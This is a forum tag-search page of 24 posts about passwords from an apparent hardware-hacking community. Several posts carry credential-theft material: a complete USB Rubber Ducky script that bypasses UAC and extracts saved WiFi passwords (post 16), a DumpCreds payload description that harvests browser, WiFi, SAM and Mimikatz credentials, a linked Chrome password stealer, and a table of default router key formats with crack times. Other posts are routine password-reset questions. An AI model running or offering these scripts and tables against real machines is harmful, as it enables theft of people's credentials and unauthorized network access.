Search the Community

Showing results for tags 'password'.




Found 24 results

  1. When running the following payload: LED G ATTACKMODE RNDIS_ETHERNET and trying to SSH into the bunny (172.16.64.10) with PuTTY as root, I always get 'Access Denied'. I've changed the default password using attackmode serial but that password is not working for SSH. I even set it back to the default hak5bunny password, but still no joy. What am I missing here?
  2. For around a year I've been using Dashlane's Premium tier however my subscription has recently run out and before I spend another $40 I want to be sure there are no better alternatives. I was looking at Lastpass as a replacement but with the upcoming acquisition by Citrix, I'm not too keen on what they might be planning for the service. I am keen on open source software and tend to use them whenever possible but in all honesty, I want to hear your experiences with the different software options available. For me I consider syncing between devices quite important however I understand this usually comes with a cost and it's normally only available on proprietary software so I am happy to sacrifice this for open and free alternatives. Cheers!
  3. DumpCreds 2.0

    Author: QDBA
    Version: Version 2.0.2
    Target: Windows

    Description

    Dumps the usernames & plaintext passwords from
      • Browsers (Chrome, IE, Firefox)
      • Wifi
      • SAM Hashes
      • Mimimk@tz Dump
      • [new] Computer information (Hardware, Software list, Hotfixes, Product Key, Users...)

    without
      • Use of USB Storage (because USB Storage is mostly blocked by USBGuard or DriveLock)
      • Internet connection (because Firewall ContentFilter blocks the download sites)

    Configuration

    None needed.

    Requirements

    Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer

    STATUS

    LED | Status
    White | Give drivers some time for installation
    Red Blink Fast | Impacket not found
    Red Blink Slow | Target did not acquire IP address
    Amber Blink Fast | Initialization
    Amber | HID Stage
    Purple Blink Fast | Wait for IP coming up
    Purple Blink Slow | Wait for Handshake (SMBServer Coming up)
    Purple / Amber | Powershell scripts running
    RED | Error in Powershell Scripts
    Green | Finished

    Download

    https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0

    ToDo

      • parallelize Creds gathering with PS
      • while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very useful at the moment, because I'm Admin on Target Host)
      • remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment
      • put some version information into the sourcecode and the output file
      • rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe!
      • If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain

    Credits to......

    https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1
    https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  4. Hey, I ordered the beautiful USB rubber ducky and it's working flawlessly. On Windows it's easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how that's possible on Windows, I don't see why it should be possible on Mac. I want to be able to find a password on a Mac computer, on Safari, Chrome or Firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed Dropbox and my computer automatically logs in to the Dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work I'll try my luck on the WiFi Pineapple NANO, just got it today. :D Thank you guys!
  5. Hi everyone, Lazagne project. First I tried to run this exe lazagne.exe on my desktop and I see in 2-3 seconds all my passwords from browsers and also hashes. So I chose to use this exe on my rubber ducky but nothing happened. I joined the script, you can download it. First I tried to run it without saving the results but in the beginning I will be happy to run it. Secondly, saving the results on the USB will be great. Thanks for the help in advance. LAZAGNE USB.txt
  6. Is there a way to reset the root password without logging in?
  7. Hi, My friend got their facebook and twitter account hacked. Do any members know if it's possible to find out 1) who could have done it? (unlikely I know) 2) location of the hack? (if Q1 is unlikely, at least by narrowing the location of the compromise can help narrow down who did it). TIA : )
  8. Hi, just throwing out an idea about making a little video about encrypting external drives with key/usb, which preferably works cross-platform.
  9. @Snubs, for Xmas I got myself a shiny and new bladeRFx40. YAY! Knowing your love for all things SDR, I wanted to share with you a synopsis of my adventures with the bladeRF. I have set up a Raspberry Pi with YateBTS and gps-sdr-sim: https://github.com/osqzss/gps-sdr-sim

    I am now able to run my own GSM BTS or spoof a GPS satellite that tells nearby devices they are actually at the Kremlin.. fun.

    YateBTS obviously really caught my interest as I quickly discovered after buying a pack of $1 SIM cards at Best Buy and putting them in a couple of unlocked devices, I was able to get the ATT cards to automatically connect to my BTS using MCC:310 and MNC:410 in combination to make my BTS appear to be an ATT tower. (No worries, as I did this in a lead box to prevent my signal from leaking to the real world, wouldn't want to interfere with the outside world.) I was also able to get T-Mobile cards to connect by manually forcing them, but I suppose I could find the MCC and MNC for them as well and get an auto connect.

    Anyway, YATES is set up to automatically send a greeting SMS to phones that connect, which I of course altered to say "Emergency Alert: Someone has farted". But it got me thinking, if someone like me with little to no real knowledge around RF was able to do this for under $500 and a 12 hour investment, why is GSM still being used? Seems like anyone could build an IMSI catcher or stingray. One could potentially go into a public venue with bad cell reception and start sending "greeting messages" to all the GSM phones with roaming enabled, creating a localized hysteria of "wait, who farted?!?" Now of course my curious mind is wondering how secure the Emergency Broadcast system is as well? https://en.wikipedia.org/wiki/Cell_Broadcast

    I would love to see you do a segment on this..

    Onus

  10. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU. For WPA2 with the GTX 970, my benchmarks with hashcat are:

    • 13,774,031,184 password hashes per day
    • 573,917,966 per hour
    • 9,565,299 per minute
    • 159,421 per second

    Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list. For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info!

    SSID | Length | Password Format | Combinations | Time
    2WIREXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs
    3MobileWiFi | 8 | 0-9 a-z | 2,821,109,907,456 | 7 mth
    3Wireless-Modem-XXXX | 8 | 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) | 65,536 | 1 sec
    Alice_XXXXXXXX | 24 | 0-9 a-z | 22,452,257,707,354,557,240,087,211,123,792,674,816 | Never
    AOLBB-XXXXXX | 8 | 0-9 A-Z | 2,821,109,907,456 | 7 mth
    ATT### | 10 | 0-9 | 10,000,000,000 | 17 hrs
    ATTxxxx 0000 | 10 | 0-9 A-Z | 3,656,158,440,062,976 | Never
    ATTxxxxxxx | 12 | a-z + symbols | 1,449,225,352,009,601,191,936 | Never
    belkin.xxx | 8 | 2-9 a-f | 1,475,789,056 | 2.5 hrs
    belkin.xxxx | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs
    Belkin.XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs
    Belkin_XXXXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs
    BigPondXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    BOLT!SUPER 4G-XXXX | 8 | 4 numbers + Last 4 of SSID | 65,536 | 1 sec
    BrightBox-XXXXXX | - | 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. | | Need dict.
    BTHomeHub(1)-XXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth
    BTHomeHub2-XXXX | 10 | 2-9 a-f | 289,254,654,976 | 3 wks
    BTHub3 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks
    BTHub4 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks
    BTHub5 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks
    BTHub6 | 10, 12 | 0-9 a-z A-Z | 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 | Never
    CenturyLinkXXXX | 14 | 0-9 a-f | 72,057,594,037,927,936 | Never
    Cisco | 26 | 0-9 a-f | 43,608,742,899,428,874,059,776 | Never
    Digicom_XXXX | 8 | 0-9 A-Z | 2,821,109,907,456 | 7 mth
    DJAWEB_##### | 10 | 0-9 | 10,000,000,000 | 17 hrs
    Domino-XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs
    E583x-xxxx | 8 | 0-9 | 10,000,000 | 1 min
    E583x-xxxxx | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs
    EasyBox 904 LTE | 9 | 0-9 a-z A-Z | 13,537,086,546,263,552 | Never
    EasyBox-###### | 9 | 0-9 A-F | 68,719,476,736 | 5 days
    EEBrightBox-XXXXXX | - | 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. | | Need dict.
    FRITZ!Box Fon WLAN #### | 16 | 0-9 | 10,000,000,000,000,000 | Never
    FrontierXXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs
    Hitron | 12 | 0-9 A-Z (sometimes use the device’s serial number as the default key!) | 4,738,381,338,321,616,896 | Never
    INFINITUM#### | 10 | 0-9 | 10,000,000,000 | 17 hrs
    iPhone 5 | ? | Lowercase word plus 4 numbers | 172000^65,536 | Need dict.
    Keenetic-XXXX | 8 | 0-9 a-z A-Z | 218,340,105,584,896 | Never
    Linkem_XXXXXX | 8 | 0-9 | 10,000,000 | 1 min
    Livebox-XXXX | ? | ? | |
    mifi2 | 13 | 0-9 A-Z | 170,581,728,179,578,208,256 | Never
    MobileWifi-xxxx | 8 | 0-9 | 10,000,000 | 1 min
    MYWIFI (EE) | - | MYWIFI + 4 numbers | 65,536 | 1 sec
    NETGEARXX | - | Adjective + Noun + 3 numbers | | Need dict.
    Netia-XXXXXX | 13 | 0-9 a-f | 4,503,599,627,370,496 | Never
    ONOXXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs
    Orange-0a0aa0 | 8 | 0-9 a-f | 4,294,967,296 | 7.5 hrs
    Orange-AA0A00 | 12 | 0-9 A-F | 281,474,976,710,656 | Never
    Orange-XXXX | 8 | 2345679 ACEF | 214,358,881 | 23 mins
    PLDT | - | PLDTWIFI + Last 5 digits of router MAC | 1 | 1 sec
    Plusnet Broadband UK | 64 | a-z A-Z 0-9 | - | Never
    PlusnetWireless-XXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    PLUSNET-XXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth
    Sitecom_XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs
    SKYXXXXX | 8 | A-Z http://www.ph-mb.com/products/sky-calc | 208,827,064,576 | 2 wks
    SpeedTouchXXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth
    TALKTALK-XXXXXX | 8 | 346789 A-Z (bar ILOSZ) | 282,429,536,481 | 3 wks
    TDC-#### | 9 | 0-9 a-f | 68,719,476,736 | 5 days
    Tech_XXXXXXXX | 8 | A-Z | 208,827,064,576 | 15 days
    Technicolor-Router | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    Telecom-XXXXXXXX | ? | ? | |
    TelstraXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    TELUSXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth
    Thomson | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    ThomsonXXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth
    TIM_PN51T_XXXX | 8 | 0-9 WPS PIN is 12345670 | 10,000,000 | 1 min
    TNCAP-XXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    TNCAPXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth
    TP-LINK_###### | 8 | 0-9 0-9 A-F | 10,000,000 | 1 min
    TRENDnet TEW-123ABC | 11 | First 3 digits in SSID (123 here) + 8 digits https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries | 2,821,109,907,456 | 7 mth
    TRKASHI-###### | 8 | 2 numbers, 6 digits | (10^2)^(26^6) | Need dict.
    UNITE-XXXX | 8 | 0-9 | 10,000,000 | 1 min
    UPCXXXXXXX | 8 | A-Z | 208,827,064,576 | 15 days
    Verizon MIFIXXXX XXXX | 11 | 0-9 | 100,000,000,000 | 7.5 days
    virginmediaXXXXXX | 8 | a-z (bar iol) | 78,310,985,281 | 6 days
    VirginMobile MiFiXXXX XXX | 11 | 0-9 | 100,000,000,000 | 7.5 days
    VMXXXXXXX | 12 | 0-9 a-z A-Z | 3,226,266,762,397,899,821,056 | Never
    VMXXXXXXX-2G | 8 | a-z (bar iol) | 78,310,985,281 | 6 days
    VMXXXXXXX-5G | 8 | a-z (bar iol) | 78,310,985,281 | 6 days
    Vodaphone_XXXXXXXX | 15 | 0-9 a-z | 221,073,919,720,733,357,899,776 | Never
    WLAN1-XXXXXX | 11 | 0-9 A-F | 17,592,186,044,416 | Never
    ZyXELXXXXXX | 13 10 | 0-9 A-Z 0-9 A-F | 1,099,511,627,776 | 2.5 mth

    Please inform me of any inaccuracies or additional data you feel could be added. Enjoy!

    *edit* My sources are my own personal experiences, plus:

    • http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/
    • https://scotthelme.co.uk/ee-brightbox-router-hacked/
    • https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959
    • https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  11. I have created a new USB Rubber Ducky script which can steal Chrome passwords in the blink of an eye. To see the code, go to my GitHub page. GitHub: https://github.com/Nuk3leus/Ducky-chrome-password-stealer Any contribution to improve this script would be great. Post on this forum or email me at Nuk3leus@gmail.com
  12. Greetings! I really hope this isn't a silly question. I was talking with my friend about the NANO and how it can deauth clients on a network, then convince those clients to connect to the NANO as a rogue access point. I realize that it is not difficult to capture and rebroadcast SSIDs, but they are always open access points. If I wanted to capture the WPA or WPA2 handshake, is there a way to either log it and send it to another machine to be cracked, or just grab whatever information the device sends to the NANO, and use that to create a copy of the original SSID complete with its password? Basically, what I am trying to figure out is if the NANO can capture data that will assist in knowing the password to a particular network. I am still learning how handshakes, frames, and beacons work, and although I have a basic understanding, I am not sure if this is feasible or not. I know WPA and WPA2 passwords are hard to crack, but would it help if the device connecting to the rogue AP tried to give that rogue AP its part of that handshake? Would it be easier (or even feasible) to just go into that client system and take whatever the saved password is and store it for future use? Any clarity or resources on this subject would be appreciated. Cheers, Dez
  13. I have been hired into a new company. One task I have been challenged with is to discover the password for a Netgear GS752TP switch we have, but I cannot wipe the switch yet. This is because no one has documentation on this switch, and they don't have VLAN information on it (this switch will be removed from PROD once I can audit it). Is there a way to 'discover' the password, or otherwise reset it like you can with Cisco switches?
  14. Regarding password statistics and differences between demographics, have a little shufti at these. Good read. https://www.unix-ninja.com/p/Password_DNA https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvUGFzc3dvcmQgRE5BIEFwcGVuZGl4IG9mIENvbXBpbGVkIERhdGEucGRm And a free wordlist, compiled from the list used to create these statistics (looks half decent); https://beta.unix-ninja.com/download/YXR0YWNobWVudHMvZG5hLmRpY3Q
  15. I have forgotten my password to my Lanturtle (you don't have to say anything). What can I do to reset my password or the device?
  16. This is my mod to the original by Siem. I changed it to save to the SD card while running twin duck software. I used code from different sources and compiled it as I am still learning.

    REM Title: WiFi password grabber save to twin duck SD
    REM Author: silent_noise
    REM Original by: Siem
    REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the SD card on the twin duck
    REM requires Twin Duck firmware and SD card to be named "DUCKY"
    REM Adjust time for driver install
    DELAY 3000
    REM Minimize all windows
    WINDOWS d
    REM Open cmd & bypass UAC
    DELAY 500
    WINDOWS r
    DELAY 200
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 500
    ALT y
    DELAY 600
    REM Define DUCKY drive as %duck%
    STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
    ENTER
    DELAY 100
    REM Getting SSID
    STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
    ENTER
    REM Creating A.txt
    STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
    ENTER
    REM Get network type
    STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
    ENTER
    REM Get authentication
    STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
    ENTER
    REM Get password
    STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
    ENTER
    REM Delete A.txt
    STRING del A.txt
    ENTER
    REM Create Log.txt
    STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
    ENTER
    DELAY 100
    REM Send Log.txt to sd card
    STRING copy Log.txt %duck%\%computername%-wifi-passwords.txt
    ENTER
    DELAY 500
    REM Delete Log.txt and exit
    STRING del Log.txt & exit
    ENTER

  17. Hey, a friend of mine bought an older computer from his employer that is running Vista Home Premium, but his employer has forgotten the administrator password and has no password recovery disk. So my friend hired me to break into it. I'm having problems though. I've tried using OPHCrack on a live disk, but for some reason it can't find the password. Anyone have any ideas?
  18. I went into "user settings" and changed "asked at login" to "not asked on login". Now I can't sign in. It does not give me the option to enter a password, just says login, but plays the incorrect pw sound when I try. I can get into the guest account, but that does me no good 'cause su and sudo don't work. I can ctrl alt f1 and login to the user there. I tried sudo visudo and changed the line to read NOPASSWD:ALL but that did not work. Anyone know how I can change back the user settings to ask for password at login from terminal?
  19. Hey there, So I was cleaning my PC by going back to the original state and when finished I created a new password. However I was a bit drunk and probably misspelled it. However after many tries I gave up and searched for other solutions. This led me to Ophcrack which I downloaded on a DVD and tried to run. But it gave an error about not finding the requested table(s). Now after a lot of tries with other programs and bootable USBs etc. it just won't work. Can anybody help me with this issue? I've got a Windows 7 64x OS.

    Starting script: ophcrack-launcher.sh
    Searching tables in: /media/sdc1/tables
    Tables found: /media/sdc/tables/vista_free/table0.bin
    List of Windows partitions containing hashes:
    0. /media/sda2/WINDOWS/System32/config
    1. /media/sda4/Windows/System32/config
    Select the partition to crack: 0
    Starting Ophcrack
    4 hashes have been found in the encrypted SAM found in /media/sda2/WINDOWS/System32/config/.
    Did not find the requested table(s) /media/sdc1/tables/vista_free/table0.bin.
    The passwords have been saved in /tmp/ophcrack.txt
    Press ENTER to continue...

    My console log

    Hope somebody can help me! If you need more information ask me! Regards, Rover PS. English is not my foreign language and I've typed the console log so there may be type mistakes.
  20. hey guys, I was hoping anyone could help me out with creating a wordlist how i desire with crunch. eg- usr1pass1, usr2pass2, usr3pass3......usr99pass99
  21. Hi, how would I sniff https passwords using the nano? I had a mark 4 a while back and I didn't have much success. Also, how would I get the client to connect to the pineapple if they are already connected to a network. Thanks!
  22. I need a 12 character AZ 09 wordlist. When I try to make one with Crunch on Kali the size is astronomical. It would be nice to be able to have crunch create a list for me that automatically prunes itself to keep a constant size consistent with the passwords per-second. http://lastbit.com/pswcalc.asp is suggesting to try every AZ09 12 digit password would probably take well longer than my lifetime. Regardless if anyone knows how to make a self deleting wordlist I would be interested to learn even if it will not be utilized where I imagined it being used. Thanks everyone.
  23. Long story short: I had a box at work get compromised and I pulled it off the network then initiated a forensic investigation. When the vendor came back with the report one section showed a memory dump of all the accounts on the box. All except one account showed their passwords encrypted, that last account showed the password in clear text in memory. What can I start looking up to understand how or why this would happen? I figured this would be a good place to ask this question. The PC is Windows 7 and the account that had its PW in clear text in the memory dump was domain admin.
  24. I just got my LAN turtle today and plugged it into my USB port. SSH (using PuTTY) to it on 172.16.84.1, got the SSH key trust, typed root for the password and the default password from the Wiki page (http://lanturtle.com/wiki/#!index.md#Connecting_for_the_first_time) but given the error access denied. Any help would be appreciated. Something tells me that the Wiki page password might be out of date. Thanks, Mule